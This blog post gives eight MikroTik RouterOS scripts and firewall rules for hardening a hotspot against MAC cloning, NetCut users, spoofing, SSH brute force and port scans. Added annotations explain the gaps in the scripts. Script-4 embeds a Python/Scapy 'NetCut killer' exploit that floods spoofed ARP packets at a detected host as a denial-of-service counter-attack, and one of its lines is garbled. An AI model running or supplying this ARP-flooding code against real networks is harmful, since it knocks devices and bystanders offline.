Thursday, 21 September 2023

Eight MikroTik Security Scripts Against 'Pranksters' and Free Wi-Fi Seekers

[An effective way to secure a MikroTik from 'free Wi-Fi signal seekers'. Why does a red message like "login failure for user root from 10.10.10.10 via telnet" keep appearing in my MikroTik log? Is it safe to use a MikroTik to build a hotspot in my office?]


Many of us use a MikroTik to manage users and Internet access for a business such as a small office/home office, a boarding house, a motel, and so on. One of the features MikroTik provides is 'forcing' our Internet users to log in first on a login page. An open Wi-Fi network, especially one broadcast by a high-power access point, can tempt 'pranksters' into breaking the Wi-Fi password or even the MikroTik we have configured.

If we open the Log on the MikroTik we will see red messages, sometimes at particular times of day, as in the picture above. Below are eight scripts which, in our experience, can currently secure the MikroTik from the mischief of pranksters within the coverage of the signal broadcast by our access point.
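The red "login failure for user root ... via telnet" entries mean the router's own management services are reachable from the hotspot side and are being probed. The scripts on this page only detect and react to that; the commands below, an added example that is not part of the original post, remove the exposure itself. Assumed names (change them to yours): the management network is 192.168.88.0/24 and the hotspot bridge is bridge1-HOTSPOT, the interface name used in Script-6.

```routeros
# Added example, not from the original post.
# Assumptions: management network 192.168.88.0/24, hotspot bridge bridge1-HOTSPOT.

# 1. Telnet and FTP are plaintext and the API is rarely needed on a hotspot router:
#    disable them (keep ftp only if you fetch backups over FTP)
/ip service
set telnet disabled=yes
set ftp disabled=yes
set api disabled=yes
set api-ssl disabled=yes
# 2. Keep SSH and Winbox, but only answer from the management network
set ssh address=192.168.88.0/24
set winbox address=192.168.88.0/24
# (www is left unchanged here; test before restricting it, because the hotspot
#  login page is served by the router itself)

# 3. Defence in depth: hotspot clients never reach the management ports, whatever
#    the service settings say. place-before=0 puts the rule at the top of the table.
/ip firewall filter
add chain=input in-interface=bridge1-HOTSPOT protocol=tcp \
    dst-port=21,22,23,8291,8728,8729 action=drop \
    comment="hotspot clients: no router management" place-before=0

# 4. Verify: the probes in the log should stop, and the drop counter should rise
#    for anything still trying
/log print where message~"login failure"
/ip firewall filter print stats where comment="hotspot clients: no router management"
```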


Script-1: Un-Cloning MAC ADDRESS

[Replace jongjava777@gmail.com with an e-mail address you own. The script only puts the offender into the address-list BlockUser; a firewall rule matching src-address-list=BlockUser is still needed for the block to take effect.]

# Hotspot on-login script: $user, $"mac-address" and $address are the variables the
# hotspot supplies when a client logs in (assumed installation point; the post does
# not say where the script is placed)
# Get user data information
:local a $user;
:local b $"mac-address";
:local c $address;
# Host name from the DHCP lease of this MAC (the get fails if no lease exists)
:local e [/ip dhcp-server lease get [find mac-address="$b"] host-name];

# The user's email field is used as storage: on the first login the host name is
# recorded there; on later logins a different host name means the MAC has been
# cloned, so the client's IP is blocked for two minutes and its session removed
:if ([:len [/ip hotspot user get [find name="$a"] email]] = 0) do={
    /ip hotspot user set [find name="$a"] email="$e-jongjava777@gmail.com"
} else={
    :if ([/ip hotspot user get [find name="$a"] email] != "$e-jongjava777@gmail.com") do={
        /ip firewall address-list add address="$c" list="BlockUser" comment="Maling-MacAddress" timeout="00:02:00";
        # one-shot scheduler: drops the active session, host entry and cookie of this
        # MAC, then removes itself ($a and $b are expanded now, at creation time)
        /system scheduler add name="$a-block" interval="00:02:00" on-event=":if ([:len [/ip hotspot active find mac-address=$b]] = 1) do={/ip hotspot active remove [find mac-address=$b]}; :if ([:len [/ip hotspot host find mac-address=$b]] = 1) do={/ip hotspot host remove [find mac-address=$b]}; :if ([:len [/ip hotspot cookie find mac-address=$b]] = 1) do={/ip hotspot cookie remove [find mac-address=$b]}; /system scheduler remove [find name=$a-block]"
    }
}

 

Script-2: Anti NetCut

[antinetcut1 flags any host name that appears in more than two DHCP leases and stores it in the global hacklist; antinetcut2 kicks those hosts off the hotspot; antinetcut3 kicks the fixed host names comp1,comp2, which you should replace with the names you want removed.]

/system script
add name=antinetcut1 policy=\
    ftp,reboot,read,write,policy,test,winbox,password,sniff,sensitive,api \
    source=":local hosts [/ip dhcp-server lease find]\r\
    \n:local pcname \"\"\r\
    \n:local pcnum 0\r\
    \n:global hacklist \"\"\r\
    \n# debug 1 logs \$hacklist on every run, debug 0 only once an hour (if \$hacklist is blank, nothing is logged)\r\
    \n:local debug 1\r\
    \n\r\
    \n:foreach h1 in=\$hosts do={\r\
    \n:local host [/ip dhcp-server lease get \$h1 host-name] \r\
    \n:if ([:len \$host] >0) do={\r\
    \n:set pcname (\$pcname . \",\" . \$host)\r\
    \n:set pcnum (\$pcnum + 1)\r\
    \n}\r\
    \n}\r\
    \n\r\
    \n:local pcnameArr [:toarray \$pcname];\r\
    \n\r\
    \n:foreach h2 in=\$pcnameArr do={\r\
    \n:local hh 0\r\
    \n:if (!([:find \$hacklist \$h2]>=0)) do={\r\
    \n:foreach k in=\$pcnameArr do={ :if (\$k=\$h2) do={:set hh (\$hh + 1) } }\r\
    \n:if (\$hh>2) do={ \r\
    \n:if ([:len \$hacklist] >0) do={:set hacklist (\$hacklist . \",\" . \$h2)} \
    else={:set hacklist \$h2}\r\
    \n}\r\
    \n}\r\
    \n}\r\
    \n\r\
    \n# monitor results in logfile once an hour \r\
    \n:local timer [:pick [/system clock get time] 3 5]\r\
    \n:if ((\$debug > 0) || (\$timer >= \"58\")) do={ \r\
    \n:if ([:len \$hacklist] >0) do={\r\
    \n:log warning (\"New Hacklist: \" . \$hacklist)\r\
    \n}\r\
    \n}\r\
    \n"
add name=antinetcut2 policy=\
    ftp,reboot,read,write,policy,test,winbox,password,sniff,sensitive,api \
    source=":local host\r\
    \n:local ipnum\r\
    \n:local unum\r\
    \n:local usr\r\
    \n:local i\r\
    \n:global hacklist\r\
    \n\r\
    \n:foreach host in=\$hacklist do={\r\
    \n:foreach i in= [/ip dhcp-server lease find host-name=\$host] do={\r\
    \n:set ipnum [/ip dhcp-server lease get \$i address]\r\
    \n:set unum [/ip hotspot active find address=\$ipnum]\r\
    \n:if ([:len \$unum] >0) do={\r\
    \n:set usr [/ip hotspot active get \$unum user]\r\
    \n:log warning (\$host . \" \" . \$ipnum . \" \" . \$usr)\r\
    \n/ip hotspot active remove \$unum\r\
    \n}\r\
    \n}\r\
    \n}\r\
    \n"
add name=antinetcut3 policy=\
    ftp,reboot,read,write,policy,test,winbox,password,sniff,sensitive,api \
    source=":local hosts [:toarray \"comp1,comp2\"]\r\
    \n:local host;\r\
    \n:local ipnum;\r\
    \n:local unum;\r\
    \n:local usr;\r\
    \n:local i;\r\
    \n\r\
    \n:foreach host in=\$hosts do={\r\
    \n   :foreach i in= [/ip dhcp-server lease find host-name=\$host] do={\r\
    \n      :set ipnum [/ip dhcp-server lease get \$i address];\r\
    \n      :set unum [/ip hotspot active find address=\$ipnum];\r\
    \n      :set usr [/ip hotspot active get \$unum user];\r\
    \n      :log warning (\$host . \" \" . \$ipnum . \" \" . \$usr);\r\
    \n      /ip hotspot active remove \$unum\r\
    \n      /ip dhcp-server lease remove [/ip dhcp-server lease find host-name=\
    \$host]\r\
    \n   }\r\
    \n}\r\
    \n"

 

Script-3 : Flush DNS

/system script
add name=cacheflush policy=ftp,reboot,read,write,policy,test,winbox,password \
    source="/ip dns cache flush"

 


Script-4 : NetCut KILLER

[Note: the source stored below is a Python/Scapy program, not RouterOS script code, so RouterOS cannot run it; the phyton-anti-net-cut scheduler entry in Script-7 will only produce a script error every 15 seconds.]

/system script

add name=phyton-anti-net-cut policy=\

    ftp,reboot,read,write,policy,test,winbox,password,sniff,sensitive,api \

    source="#!/usr/bin/env python\r\

    \n#Exploit Title: Netcut Denial of Service Vulnerability\r\

    \55:33 Network\r\  \n#Blog: https://variouslight.blogspot.com\r\

    \n#PoC: Video  https://youtube.com/channel/UCuF5rIPZecm0HLkXuwydABw\r\

    \n#     Picture http://3.bp.blogspot.com/-GcwpOXx7ers/TwGVoyj8SmI/AAAAAAAAAx\

    s/wSGL1tKGflc/s1600/a.png\r\

    \n#Version: Netcut 2\r\

    \n#Software Link: http://www.mediafire.com/\?jiiyq2wcpp41266\r\

    \n#Tested on: Windows Xp, Windows 7\r\

    \n#Greetz :  ZeQ3uL, c1ph3r, x-c0d3, p3lo, Retool2, Gen0TypE, Windows98SE, S\

    umedt, Rocky Sharma\r\

    \n \r\

    \nfrom scapy.all import sniff,Ether,ARP,RandIP,RandMAC,Padding,sendp,conf\r\

    \nimport commands,os,sys\r\

    \n \r\

    \n#gw_mac = commands.getoutput(\"arp -i %s | grep %s\" % (conf.iface,conf.if\

    ace)).split()[2]\r\

    \ngw_ip  = commands.getoutput(\"ip route list | grep default\").split()[2]\r\

    \n     \r\

    \ndef protect(gw_ip,gw_mac):\r\

    \n    os.popen(\"arp -s %s %s\" %(gw_ip,gw_mac))\r\

    \n    print \"Protected himself\"\r\

    \n     \r\

    \ndef detect():\r\

    \n        ans = sniff(filter='arp',timeout=7)\r\

    \n        target=[]\r\

    \n        for r in ans.res:\r\

    \n            target.append(r.sprintf(\"%ARP.pdst% %ARP.hwsrc% %ARP.psrc%\")\

    ) \r\

    \n        return target\r\

    \n \r\

    \ndef preattack(gw_ip):\r\

    \n    num = []\r\

    \n    count = 0\r\

    \n    target = 0\r\

    \n    temp = 0\r\

    \n    print \"Detecting...\"\r\

    \n    d = detect()\r\

    \n    for i in range(len(d)):\r\

    \n        if d[i].split()[0] == \"255.255.255.255\":\r\

    \n            num.append(d.count(d[i])) \r\

    \n            if d.count(d[i]) > count:\r\

    \n                count = d.count(d[i])\r\

    \n                target = i\r\

    \n        if d[i].split()[0] == gw_ip:\r\

    \n            temp += 1      \r\

    \n    if len(d) < 7:\r\

    \n        print \"[-] No one use Netcut or try again\"\r\

    \n        exit()\r\

    \n    if len(num)*7 < temp:\r\

    \n        num[:] = []\r\

    \n        count = 0\r\

    \n        result = float(temp)/len(d)*100\r\

    \n        for j in range(len(d)):\r\

    \n            if d[i].split()[0] == gw_ip:\r\

    \n                num.append(d.count(d[j]))\r\

    \n                if d.count(d[i]) > count:\r\

    \n                    count = d.count(d[i])\r\

    \n                    target = i\r\

    \n            num.reverse()\r\

    \n            result = float(temp)/len(d)*100\r\

    \n        print target \r\

    \n    else:\r\

    \n        num.reverse()\r\

    \n        result = float(num[0]+temp)/len(d)*100\r\

    \n     \r\

    \n    print \"There is a possibility that \" + str(result) + \"%\"\r\

    \n    if result>= 50:\r\

    \n        target_mac = d[target].split()[1]\r\

    \n        target_ip = d[target].split()[2]\r\

    \n        print \"[+]Detected, Netcut using by IP %s MAC %s\" %(target_ip,ta\

    rget_mac)\r\

    \n        attack(target_mac,target_ip,gw_ip)    \r\

    \n    else:\r\

    \n        print \"[-] No one use Netcut or try again\"\r\

    \n \r\

    \ndef attack(target_mac,target_ip,gw_ip):\r\

    \n    print \"[+]Counter Attack !!!\"\r\

    \n    e = Ether(dst=\"FF:FF:FF:FF:FF:FF\")\r\

    \n    while 1:\r\

    \n        a = ARP(psrc=RandIP(),pdst=RandIP(),hwsrc=RandMAC(),hwdst=RandMAC(\

    ),op=1)\r\

    \n        p = e/a/Padding(\"\\x00\"*18)\r\

    \n        sendp(p,verbose=0)\r\

    \n        a1 = ARP(psrc=gw_ip,pdst=target_ip,hwsrc=RandMAC(),hwdst=target_ma\

    c,op=2)\r\

    \n        p1 = e/a1/Padding(\"\\x00\"*18)\r\

    \n        sendp(p1,verbose=0)\r\

    \n         \r\

    \nif __name__ == '__main__':\r\

    \n    os.system(\"clear\")\r\

    \n    print   \"###################################################\"\r\

    \n    print    \" __  __    __     __    _____   __      __  _   _\"\r\

    \n    print    \"|  \\/  |   \\ \\   / /   / ____|  \\ \\    / / | \\ | |\"\

    \r\

    \n    print    \"| \\  / | __ \\ \\_/ /_ _| (___   __\\ \\  / /__|  \\| |\"\

    \r\

    \n    print    \"| |\\/| |/ _\\ \\   / _\\ |\\___ \\ / _ \\ \\/ / _ \\ . \\ \

    |\"\r\

    \n    print    \"| |  | | (_| || | (_| |____) |  __/\\  /  __/ |\\  |\"\r\

    \n    print    \"|_|  |_|\\__,_||_|\\__,_|_____/ \\___| \\/ \\___|_| \\_|\"\

    \r\

    \n    print   \" \"\r\

    \n    print   \"###################################################\"\r\

    \n    print   \"\"\r\

    \n    print   \"https://variouslight.blogspot.com\"\r\

    \n    print   \"\"\r\

    \n    if len(sys.argv) == 2 or len(sys.argv) == 3:\r\

    \n        if len(sys.argv) == 2:\r\

    \n            conf.iface=sys.argv[1]\r\

    \n            preattack(gw_ip)\r\

    \n        if len(sys.argv) == 3:\r\

    \n            conf.iface=sys.argv[1]\r\

    \n            gw_mac = sys.argv[2]\r\

    \n            protect(gw_ip,gw_mac)\r\

    \n            preattack(gw_ip)\r\

    \n    else:\r\

    \n        print '''Mode:   \r\

    \n1.)Attack only\r\

    \nUsage: NetcutKiller <Interface>\r\

    \ne.g. NetcutKiller.py wlan0\r\

    \n         \r\

    \n2.)Attack with protect himself\r\

    \nUsage: NetcutKiller <Interface> <MAC_Gateway> \r\

    \ne.g. NetcutKiller.py wlan0 00:FA:77:AA:BC:AF \r\

    \n'''"

 


Script-5 : Clear Connection

[This removes every entry from the connection-tracking table each time it runs (every 12 hours in Script-7); all tracking state is lost, so sessions in progress through the router can be interrupted.]

/system script
add name=clear-connections policy=\
    ftp,reboot,read,write,policy,test,winbox,password,sniff,sensitive,api \
    source=":log info message=\"clearing connections begin\"\r\
    \n:foreach i in=[/ip firewall connection find] do={/ip firewall connection remove \$i}\r\
    \n:log info message=\"clearing connections end\"\r\
    \n"

 

 

Script-6 : Anti Spoofing

[Change bridge1-HOTSPOT to the name of your hotspot interface. The script only fills the address-list ipv4-ether1-gateway-interfacesubnet with the hotspot subnet; no rule on this page uses that list, so a firewall rule that matches on it is needed for the script to have any effect.]

/system script
add name=ip-spoofing policy=\
    ftp,reboot,read,write,policy,test,winbox,password,sniff,sensitive,api \
    source=":local interfacesubnet [/ip address get [/ip address find where interface=bridge1-HOTSPOT] address];\r\
    \n/ip firewall address-list add address=\$interfacesubnet list=ipv4-ether1-gateway-interfacesubnet"

 

Script-7 : Anti MAC Clone Schedule

[First configure System > SNTP Client on your MikroTik. The anti-mac-clone entry carries the same code as antinetcut1 from Script-2, so that detection runs twice every 15 seconds.]

/system scheduler
add disabled=no interval=15s name=anti-mac-clone on-event=":local hosts [/ip dhc\
    p-server lease find]\r\
    \n:local pcname \"\"\r\
    \n:local pcnum 0\r\
    \n:global hacklist \"\"\r\
    \n# debug 1 logs \$hacklist on every run, debug 0 only once an hour (if \$hacklist is blank, nothing is logged)\r\
    \n:local debug 1\r\
    \n\r\
    \n:foreach h1 in=\$hosts do={\r\
    \n:local host [/ip dhcp-server lease get \$h1 host-name] \r\
    \n:if ([:len \$host] >0) do={\r\
    \n:set pcname (\$pcname . \",\" . \$host)\r\
    \n:set pcnum (\$pcnum + 1)\r\
    \n}\r\
    \n}\r\
    \n\r\
    \n:local pcnameArr [:toarray \$pcname];\r\
    \n\r\
    \n:foreach h2 in=\$pcnameArr do={\r\
    \n:local hh 0\r\
    \n:if (!([:find \$hacklist \$h2]>=0)) do={\r\
    \n:foreach k in=\$pcnameArr do={ :if (\$k=\$h2) do={:set hh (\$hh + 1) } }\r\
    \n:if (\$hh>2) do={ \r\
    \n:if ([:len \$hacklist] >0) do={:set hacklist (\$hacklist . \",\" . \$h2)} \
    else={:set hacklist \$h2}\r\
    \n}\r\
    \n}\r\
    \n}\r\
    \n\r\
    \n# monitor results in logfile once an hour \r\
    \n:local timer [:pick [/system clock get time] 3 5]\r\
    \n:if ((\$debug > 0) || (\$timer >= \"58\")) do={ \r\
    \n:if ([:len \$hacklist] >0) do={\r\
    \n:log warning (\"New Hacklist: \" . \$hacklist)\r\
    \n}\r\
    \n}\r\
    \n" policy=\
    ftp,reboot,read,write,policy,test,winbox,password,sniff,sensitive,api \
    start-date=mar/22/2023 start-time=00:00:01
add disabled=no interval=6h name=cacheflush on-event=cacheflush policy=\
    ftp,reboot,read,write,policy,test,winbox,password,sniff,sensitive,api \
    start-date=mar/22/2023 start-time=23:59:59
add disabled=no interval=12h name=clear-connections on-event=clear-connections \
    policy=\
    ftp,reboot,read,write,policy,test,winbox,password,sniff,sensitive,api \
    start-date=mar/22/2023 start-time=23:00:00
add disabled=no interval=15s name=antinetcut1 on-event=antinetcut1 policy=\
    ftp,reboot,read,write,policy,test,winbox,password,sniff,sensitive,api \
    start-date=mar/22/2023 start-time=00:00:02
add disabled=no interval=15s name=antinetcut2 on-event=antinetcut2 policy=\
    ftp,reboot,read,write,policy,test,winbox,password,sniff,sensitive,api \
    start-date=mar/22/2023 start-time=00:00:03
add disabled=no interval=15s name=antinetcut3 on-event=antinetcut3 policy=\
    ftp,reboot,read,write,policy,test,winbox,password,sniff,sensitive,api \
    start-date=mar/22/2023 start-time=00:00:04
add disabled=no interval=15s name=phyton-anti-net-cut on-event=\
    phyton-anti-net-cut policy=\
    ftp,reboot,read,write,policy,test,winbox,password,sniff,sensitive,api \
    start-date=mar/22/2023 start-time=00:00:06
add disabled=no interval=15s name=ip-spoofing on-event=ip-spoofing policy=\
    ftp,reboot,read,write,policy,test,winbox,password,sniff,sensitive,api \
    start-date=mar/22/2023 start-time=00:00:05

 

Script-8 : Router Protection

[Groups 5 and 6 below sit in custom chains named udp and tcp. RouterOS evaluates a custom chain only when a jump rule from input, forward or output points to it, and this export contains no such jump, so those two groups do nothing until one is added.]

/ip firewall filter
add action=reject chain=forward comment="1>Block Bogus IP Address" disabled=no \
    reject-with=icmp-network-unreachable src-address=0.0.0.0/8
add action=reject chain=forward disabled=no dst-address=0.0.0.0/8 reject-with=\
    icmp-network-unreachable
add action=reject chain=forward disabled=no reject-with=\
    icmp-network-unreachable src-address=127.0.0.0/8
add action=reject chain=forward disabled=no dst-address=127.0.0.0/8 \
    reject-with=icmp-network-unreachable
add action=reject chain=forward disabled=no reject-with=\
    icmp-network-unreachable src-address=224.0.0.0/3
add action=reject chain=forward disabled=no dst-address=224.0.0.0/3 \
    reject-with=icmp-network-unreachable
add action=reject chain=forward disabled=no reject-with=\
    icmp-network-unreachable src-address=239.0.0.0/8
add action=reject chain=forward disabled=no dst-address=239.0.0.0/8 \
    reject-with=icmp-network-unreachable
add action=drop chain=input comment="2>Drop SSH brute forcers" disabled=no \
    dst-port=22 protocol=tcp src-address-list=ssh_blacklist
add action=add-src-to-address-list address-list=ssh_blacklist \
    address-list-timeout=1w3d chain=input connection-state=new disabled=no \
    dst-port=22 protocol=tcp src-address-list=ssh_stage3
add action=add-src-to-address-list address-list=ssh_stage3 \
    address-list-timeout=1m chain=input connection-state=new disabled=no \
    dst-port=22 protocol=tcp src-address-list=ssh_stage2
add action=add-src-to-address-list address-list=ssh_stage2 \
    address-list-timeout=1m chain=input connection-state=new disabled=no \
    dst-port=22 protocol=tcp src-address-list=ssh_stage1
add action=add-src-to-address-list address-list=ssh_stage1 \
    address-list-timeout=1m chain=input connection-state=new disabled=no \
    dst-port=22 protocol=tcp
add action=add-src-to-address-list address-list="port scanners" \
    address-list-timeout=2w chain=input comment="3>Port Scanners to list" \
    disabled=no protocol=tcp psd=21,3s,3,1
add action=add-src-to-address-list address-list="port scanners" \
    address-list-timeout=2w chain=input disabled=no protocol=tcp tcp-flags=\
    fin,!syn,!rst,!psh,!ack,!urg
add action=add-src-to-address-list address-list="port scanners" \
    address-list-timeout=2w chain=input disabled=no protocol=tcp tcp-flags=\
    fin,syn
add action=add-src-to-address-list address-list="port scanners" \
    address-list-timeout=2w chain=input disabled=no protocol=tcp tcp-flags=\
    syn,rst
add action=add-src-to-address-list address-list="port scanners" \
    address-list-timeout=2w chain=input disabled=no protocol=tcp tcp-flags=\
    fin,psh,urg,!syn,!rst,!ack
add action=add-src-to-address-list address-list="port scanners" \
    address-list-timeout=2w chain=input disabled=no protocol=tcp tcp-flags=\
    fin,syn,rst,psh,ack,urg
add action=add-src-to-address-list address-list="port scanners" \
    address-list-timeout=2w chain=input disabled=no protocol=tcp tcp-flags=\
    !fin,!syn,!rst,!psh,!ack,!urg
add action=drop chain=input disabled=no src-address-list="port scanners"
add action=drop chain=input comment="4>Filter FTP to Box" disabled=no dst-port=\
    21 protocol=tcp src-address-list=ftp_blacklist
add action=accept chain=output content="530 Login incorrect" disabled=no \
    dst-limit=1/1m,9,dst-address/1m protocol=tcp
add action=add-dst-to-address-list address-list=ftp_blacklist \
    address-list-timeout=3h chain=output content="530 Login incorrect" \
    disabled=no protocol=tcp
add action=reject chain=udp comment="5>Blocking UDP Packet" disabled=no \
    dst-port=69 protocol=udp reject-with=icmp-network-unreachable
add action=reject chain=udp disabled=no dst-port=111 protocol=udp reject-with=\
    icmp-network-unreachable
add action=reject chain=udp disabled=no dst-port=135 protocol=udp reject-with=\
    icmp-network-unreachable
add action=reject chain=udp disabled=no dst-port=137-139 protocol=udp \
    reject-with=icmp-protocol-unreachable
add action=reject chain=udp disabled=no dst-port=2049 protocol=udp reject-with=\
    icmp-network-unreachable
add action=reject chain=udp disabled=no dst-port=3133 protocol=udp reject-with=\
    icmp-network-unreachable
add action=reject chain=udp disabled=no dst-port=5355 protocol=udp reject-with=\
    icmp-protocol-unreachable
add action=drop chain=tcp comment="6>Bloking TCP Packet" disabled=no dst-port=\
    69 protocol=tcp
add action=drop chain=tcp disabled=no dst-port=111 protocol=tcp
add action=drop chain=tcp disabled=no dst-port=119 protocol=tcp
add action=drop chain=tcp disabled=no dst-port=135 protocol=tcp
add action=drop chain=tcp disabled=no dst-port=137-139 protocol=tcp
add action=drop chain=tcp disabled=no dst-port=445 protocol=tcp
add action=drop chain=tcp disabled=no dst-port=2049 protocol=tcp
add action=drop chain=tcp disabled=no dst-port=12345-12346 protocol=tcp
add action=drop chain=tcp disabled=no dst-port=20034 protocol=tcp
add action=drop chain=tcp disabled=no dst-port=3133 protocol=tcp
add action=drop chain=tcp disabled=no dst-port=67-68 protocol=tcp
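Scripts 1, 6 and 8 fill address-lists (BlockUser, ipv4-ether1-gateway-interfacesubnet) and custom chains (tcp, udp) that no rule on this page consumes. The rules below are an added example, not part of the original post, that wires them into the firewall so the detection actually drops traffic; it assumes the hotspot bridge is bridge1-HOTSPOT as in Script-6, and that the ip-spoofing script has run at least once before the spoofing rule is added.

```routeros
# Added example, not from the original post. Assumes hotspot bridge bridge1-HOTSPOT
# and the list/chain names used by Scripts 1, 6 and 8 above.
/ip firewall filter

# Script-1: MAC-clone suspects land in "BlockUser" for two minutes; drop what they
# send through the router and to the router
add chain=forward src-address-list=BlockUser action=drop \
    comment="Script-1: drop MAC-clone suspects" place-before=0
add chain=input src-address-list=BlockUser action=drop \
    comment="Script-1: keep MAC-clone suspects off the router" place-before=0

# Script-6: a packet entering from the hotspot bridge whose source is outside the
# hotspot subnet is spoofed. Run the ip-spoofing script once before adding this
# rule; while the list is empty it would drop every hotspot client.
add chain=forward in-interface=bridge1-HOTSPOT \
    src-address-list=!ipv4-ether1-gateway-interfacesubnet action=drop \
    comment="Script-6: drop spoofed source addresses" place-before=0

# Script-8: the custom chains "tcp" and "udp" (groups 5 and 6) are evaluated only
# when a built-in chain jumps to them; apply them to traffic addressed to the
# router (input) and to traffic passing through it (forward)
add chain=input protocol=tcp action=jump jump-target=tcp \
    comment="Script-8: tcp chain" place-before=0
add chain=input protocol=udp action=jump jump-target=udp \
    comment="Script-8: udp chain" place-before=0
add chain=forward protocol=tcp action=jump jump-target=tcp \
    comment="Script-8: tcp chain (forward)" place-before=0
add chain=forward protocol=udp action=jump jump-target=udp \
    comment="Script-8: udp chain (forward)" place-before=0

# Verify: packet counters in the custom chains rise once the jumps are in place,
# and BlockUser shows who Script-1 has flagged
/ip firewall filter print stats where chain=tcp
/ip firewall filter print stats where chain=udp
/ip firewall address-list print where list=BlockUser
```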

 

 



Please copy & paste them into your MikroTik, then check System > Script List & Scheduler as in the picture below:


Good luck, and we hope this is useful.

